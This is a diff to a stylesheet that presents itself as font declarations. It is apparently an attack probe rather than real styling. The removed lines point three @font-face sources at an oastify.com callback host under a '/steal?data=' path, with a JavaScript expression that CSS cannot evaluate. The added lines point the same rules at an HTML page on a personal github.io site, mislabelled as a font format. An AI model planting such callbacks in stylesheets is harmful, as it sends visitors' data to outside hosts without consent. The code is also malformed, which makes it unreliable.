--- a/boom.css
+++ b/boom.css
@@ -4,7 +4,9 @@
   font-style: normal;
   font-weight: 700;
   font-display: swap;
-  src: url("https://gtd5vfeul0n5sroztwkzyk3w8nek2aqz.oastify.com/steal?data=" + window.origin);
+  src:
+    local('Sharp-Grotesk-Medium'),
+    url('https://shashank134.github.io/madara670/boom.html') format('html');
 }
 
 @font-face {
@@ -13,7 +15,9 @@
   font-style: normal;
   font-weight: 500;
   font-display: swap;
-  src: url("https://gtd5vfeul0n5sroztwkzyk3w8nek2aqz.oastify.com/steal?data=" + window.origin);
+  src:
+    local('Sharp-Grotesk-Medium'),
+    url('https://shashank134.github.io/madara670/boom.html') format('html');
 }
 
 @font-face {
@@ -22,7 +26,9 @@
   font-style: normal;
   font-weight: 400;
   font-display: swap;
-  src: url("https://gtd5vfeul0n5sroztwkzyk3w8nek2aqz.oastify.com/steal?data=" + window.origin);
+  src:
+    local('Sharp-Grotesk-Medium'),
+    url('https://shashank134.github.io/madara670/boom.html') format('html');
 }
 
 body,
